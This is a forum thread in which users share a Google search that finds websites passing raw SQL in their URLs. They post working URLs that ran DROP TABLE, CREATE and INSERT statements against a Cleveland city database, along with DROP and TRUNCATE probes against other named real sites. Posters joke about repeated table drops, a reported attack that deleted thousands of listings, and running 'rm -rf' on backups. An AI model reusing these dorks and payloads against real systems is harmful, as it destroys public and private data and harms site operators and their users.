The following Google query returns some fantastic results (thousands of them):

 inurl:select inurl:where inurl:%20

Not that I tried, of course.

I especially didn't try on the United Nations homepage.

Microsoft OLE DB Provider for ODBC Drivers error '80040e14'

[Microsoft][ODBC SQL Server Driver][SQL Server]User does not have permission to perform this operation on table 'Restaurantes'.

/Gastronomia/RestaurantesI.asp, line 204

 Shit shit shit, though I hate to admit it, I dropped a table on the city of cleveland's website.

  http://cd.city.cleveland.oh.us/scripts/sql.php?db=landbank&table=cityport&sql_query=SELECT+Ward%2C+PPN%2C+Street_Number%2C+Street_Name%2C+Frontage_of_Parcel%2C+Depth_of_Parcel%2C+Sqfeet++++%0D%0AFROM+cityport%0D%0AWHERE+Buildescr+%3D+'Non-Buildable'+and+Ward+in+(12%2C+13%2C+14%2C+15%2C+16%2C+17%2C+18%2C+19%2C+20%2C+21)&sql_order=+order+by+'Ward'+ASC&pos=120 turned into

http://cd.city.cleveland.oh.us/scripts/sql.php?db=landbank&table=cityport&sql_query=DROP TABLE cityport

Am I going to jail now? Maybe I can find a google cache of the database and manually restore it.

WHO USES sql_querys in the URL and FURTHERMORE who the hell gives that user FULL DATABASE ACCESS, why not just read on certain tables.

The sad AND scary thing is that most of the results I get from that google search are for GOVERNMENT websites. Who the hell are they contracting to do their web work?

You've got to be kidding me.

Stumbled onto this gem too..

http://cd.city.cleveland.oh.us/scripts/LandbankReports.05232007 

You know, I thought you must be joking or something at first, until I went to that site myself and did a search on all records, and it didn't turn up anything. Wow.

Way to go, random Cleveland site.  You have the worst security I've seen in my life, and have just paid for it.  Do a better job next time.

Bladezor:

The sad AND scary thing is that most of the results I get from that google search are for GOVERNMENT websites. Who the hell are they contracting to do their web work?

The lowest bidder. Enough said.

Ok, I did what I could to "restore" their database.

Recreate the table:

http://cd.city.cleveland.oh.us/scripts/sql.php?db=landbank&sql_query=CREATE TABLE landbank.cityport (Ward TEXT NOT NULL, PPN TEXT NOT NULL ,Street_Number TEXT NOT NULL, Street_Name TEXT NOT NULL, Frontage_of_Parcel TEXT NOT NULL, Depth_of_Parcel TEXT NOT NULL, Sqfeet TEXT NOT NULL, Buildescr TEXT NOT NULL)

Populate it:

http://cd.city.cleveland.oh.us/scripts/sql.php?db=landbank&table=cityport&sql_query=INSERT INTO landbank.cityport VALUES("18","00515009","3091","W%20106TH%20ST","25","105","2625","Non-Buildable")
http://cd.city.cleveland.oh.us/scripts/sql.php?db=landbank&table=cityport&sql_query=INSERT INTO landbank.cityport VALUES("19","01919053","0","WANDA%20AVE","40","112","4480","Non-Buildable")
http://cd.city.cleveland.oh.us/scripts/sql.php?db=landbank&table=cityport&sql_query=INSERT INTO landbank.cityport VALUES("19","01917012","0","BELLAIRE%20RD","64","65","4160","Non-Buildable")
http://cd.city.cleveland.oh.us/scripts/sql.php?db=landbank&table=cityport&sql_query=INSERT INTO landbank.cityport VALUES("19","01917011","0","BELLAIRE%20RD","40","99","3960","Non-Buildable")
http://cd.city.cleveland.oh.us/scripts/sql.php?db=landbank&table=cityport&sql_query=INSERT INTO landbank.cityport VALUES("19","01916150","0","LEEILA%20AVE","40","111","4440","Non-Buildable")
http://cd.city.cleveland.oh.us/scripts/sql.php?db=landbank&table=cityport&sql_query=INSERT INTO landbank.cityport VALUES("19","01916149","0","LEEILA%20AVE","40","111","4440","Non-Buildable")
http://cd.city.cleveland.oh.us/scripts/sql.php?db=landbank&table=cityport&sql_query=INSERT INTO landbank.cityport VALUES("19","01826053","0","BROOKLAWN%20AVE","297","73","21681","Non-Buildable")
http://cd.city.cleveland.oh.us/scripts/sql.php?db=landbank&table=cityport&sql_query=INSERT INTO landbank.cityport VALUES("19","01826052","0","BROOKLAWN%20AVE","71","52","3692","Non-Buildable")
http://cd.city.cleveland.oh.us/scripts/sql.php?db=landbank&table=cityport&sql_query=INSERT INTO landbank.cityport VALUES("20","02225081","0","VICTORY%20BLVD","61","89","5429","Non-Buildable")
http://cd.city.cleveland.oh.us/scripts/sql.php?db=landbank&table=cityport&sql_query=INSERT INTO landbank.cityport VALUES("20","02225080","0","VICTORY%20BLVD","62","110","6820","Non-Buildable")
http://cd.city.cleveland.oh.us/scripts/sql.php?db=landbank&table=cityport&sql_query=INSERT INTO landbank.cityport VALUES("20","02225079","0","VICTORY%20BLVD","68","119","8092","Non-Buildable")
http://cd.city.cleveland.oh.us/scripts/sql.php?db=landbank&table=cityport&sql_query=INSERT INTO landbank.cityport VALUES("20","02225034","0","W%20140%20ST","21","232","4872","Non-Buildable")
http://cd.city.cleveland.oh.us/scripts/sql.php?db=landbank&table=cityport&sql_query=INSERT INTO landbank.cityport VALUES("20","02225078","0","VICTORY%20BLVD","60","113","6780","Non-Buildable")
http://cd.city.cleveland.oh.us/scripts/sql.php?db=landbank&table=cityport&sql_query=INSERT INTO landbank.cityport VALUES("20","02010091","0","MILLIGAN%20AVE","35","109","3815","Non-Buildable")
http://cd.city.cleveland.oh.us/scripts/sql.php?db=landbank&table=cityport&sql_query=INSERT INTO landbank.cityport VALUES("20","02009088","0","MILLIGAN%20AVE","35","109","3815","Non-Buildable")
http://cd.city.cleveland.oh.us/scripts/sql.php?db=landbank&table=cityport&sql_query=INSERT INTO landbank.cityport VALUES("20","02009087","0","MILLIGAN%20AVE","35","109","3815","Non-Buildable")
http://cd.city.cleveland.oh.us/scripts/sql.php?db=landbank&table=cityport&sql_query=INSERT INTO landbank.cityport VALUES("20","02009086","0","MILLIGAN%20AVE","35","109","3815","Non-Buildable")
http://cd.city.cleveland.oh.us/scripts/sql.php?db=landbank&table=cityport&sql_query=INSERT INTO landbank.cityport VALUES("20","02009085","0","MILLIGAN%20AVE","35","109","3815","Non-Buildable")
http://cd.city.cleveland.oh.us/scripts/sql.php?db=landbank&table=cityport&sql_query=INSERT INTO landbank.cityport VALUES("20","02009084","0","MILLIGAN%20AVE","35","109","3815","Non-Buildable")
http://cd.city.cleveland.oh.us/scripts/sql.php?db=landbank&table=cityport&sql_query=INSERT INTO landbank.cityport VALUES("20","02009083","0","MILLIGAN%20AVE","35","109","3815","Non-Buildable")
http://cd.city.cleveland.oh.us/scripts/sql.php?db=landbank&table=cityport&sql_query=INSERT INTO landbank.cityport VALUES("20","02009082","0","MILLIGAN%20AVE","35","109","3815","Non-Buildable")
http://cd.city.cleveland.oh.us/scripts/sql.php?db=landbank&table=cityport&sql_query=INSERT INTO landbank.cityport VALUES("20","02009081","0","MILLIGAN%20AVE","35","109","3815","Non-Buildable")
http://cd.city.cleveland.oh.us/scripts/sql.php?db=landbank&table=cityport&sql_query=INSERT INTO landbank.cityport VALUES("20","02009080","0","MILLIGAN%20AVE","35","109","3815","Non-Buildable")
http://cd.city.cleveland.oh.us/scripts/sql.php?db=landbank&table=cityport&sql_query=INSERT INTO landbank.cityport VALUES("20","02009079","0","MILLIGAN%20AVE","35","109","3815","Non-Buildable")

Good enough..?

http://www.websahara.de/query.php?query=select+[snip]+from+land%2C+bild+where+[snip]&start=20&showrow=5 

You can abuse this to show more records, but when you try to DROP the table with

http://www.websahara.de/query.php?query=DROP+TABLE+land+%2c+bild&start=0&showrow=5

you will get:

bobday:

http://www.websahara.de/query.php?query=select+[snip]+from+land%2C+bild+where+[snip]&start=20&showrow=5 

You can abuse this to show more records, but when you try to DROP the table with

http://www.websahara.de/query.php?query=DROP+TABLE+land+%2c+bild&start=0&showrow=5

you will get: 

It's just searching for some substrings like delete or drop, but it appears security is enforced properly:

http://www.websahara.de/query.php?query=truncate%20table+land

It didn't catch the query, but you get an Access denied for user: 'websahara@localhost' to database 'websahara'

I just noticed this page in the search results:

http://www.sleep-in.ch/suchergebnis_gast.php?zoneid=10&katid=&minpers=&lang=d&Anfangsposition=40&abfrage=SELECT+i_id%2Ci_name%2Ci_vorname%2Ccb.bez+as+cod_bez%2Csubstring(value%2C1%2C20)+as+l_value%2Ci_max_personen%2Ci_zeitraum_von%2Ci_zeitraum_bis%2C+zb.bezeichnung+as+z_bez%2Ci_bemerkung%2CUNIX_TIMESTAMP(i_mutiert_am)+as+mutdat%0D%0A+++++++++++++FROM+inserate%2C+codes+co%2C+codebez+cb%2C+countries+c%2C+zonen+z%2C+zonenbez+zb%0D%0A++++++++++++where+i_rubrik_cod_id+%3D+100%0D%0A++++++++++++++and+i_typ_cod_id+%3D+200%0D%0A++++++++++++++and+i_status_cod_id+%3D+900%0D%0A++++++++++++++and+i_kat_cod_id+%3D+co.cod_id%0D%0A++++++++++++++and+co.cod_id+%3D+cb.cod_id%0D%0A++++++++++++++and+cb.spr_id+%3D+'d'+%0D%0A++++++++++++++and+i_land+%3D+c.id+%0D%0A++++++++++++++and+i_z_id+%3D+z.z_id%0D%0A++++++++++++++and+z.z_id+%3D+zb.z_id%0D%0A++++++++++++++and+zb.spr_id+%3D+'d'+and+i_z_id+in+('3'%2C'11'%2C'12'%2C'13')+order+by+cod_bez%2C+UNIX_TIMESTAMP(i_mutiert_am)+desc+&PHPSESSID=3b40f967208e224666840320c4a51273

and now I remember having read about that site in the local newspapers a few days ago. They were reported to have lost records last friday, and the operators restored to the last backup. Shall I help them test their backup/restore procedure once again?  :-) 

 BTW, this is what they report under "Aktuell" == "news":

In der Nacht vom Sonntag, 20. April auf Montag 21. April 2008 wurde sleep-in.ch Opfer eines Hacker-Angriffs.

Dabei wurden alle Angebote der über 2800 Gastgeber und Gäste gezielt gelöscht. Sleep-In konnte mit wenigen Ausnahmen alle Inserate wiederherstellen (Stand Sonntag Morgen). Sleep-In entschuldigt sich bei seinen Gastgeber und Gästen und arbeitet mit Hochdruck daran, dass sich dieser Vorfall nicht wiederholen kann.

Aber natürlich sind wir verärgert und enttäuscht.

Trotzdem: Auf eine gfreute Euro08!

Translates to

During the night sunday, april 20 to monday april 21, sleep-in.ch has become the victim of a hacker attack.

Thereby, all offers of more than 2800 hosts and guests have been deleted on purpose. Sleep-in was able to restore all ads with only a few exception (status of sunday morning). Sleep-In is apologizing to all hosts and guests and is working with high pressure to not let this incident repeat itself.

But of course, we are angry and disappointed.

Still: Enjoy a happy Euro08! 

TheRider:

 BTW, this is what they report under "Aktuell" == "news":

During the night sunday, april 20 to monday april 21, sleep-in.ch has become the victim of a hacker attack.

Thereby, all offers of more than 2800 hosts and guests have been deleted on purpose. Sleep-in was able to restore all ads with only a few exception (status of sunday morning). Sleep-In is apologizing to all hosts and guests and is working with high pressure to not let this incident repeat itself.

But of course, we are angry and disappointed.

Still: Enjoy a happy Euro08! 

Now, what do we say!

They only do nightly backups, people should delete their records in the evening 

" aah!! h4xx0rs!! "

Bladezor:

hate on cleveland

Bladezor:

Ugh, one of you guys dropped the table again..I'm not fixing it again..

galgorah:

Bladezor:

Ugh, one of you guys dropped the table again..I'm not fixing it again..

I get the feeling that by the end of the day their database is going to be in a sad state of affairs.

Bonus points if someone succeeds in executing rm -rf /var/backup :) 

t-bone:

Bonus points prison rape if someone succeeds in executing rm -rf /var/backup :) 

FTFY.

belgariontheking:

Sig: To fill your mind with knowledge, we must start by emptying it

That's really funny, considering the context of this thread. 

Looks like they took it offline, or someone dropped the database(s)

Xiphonex:

Looks like they took it offline, or someone dropped the database(s)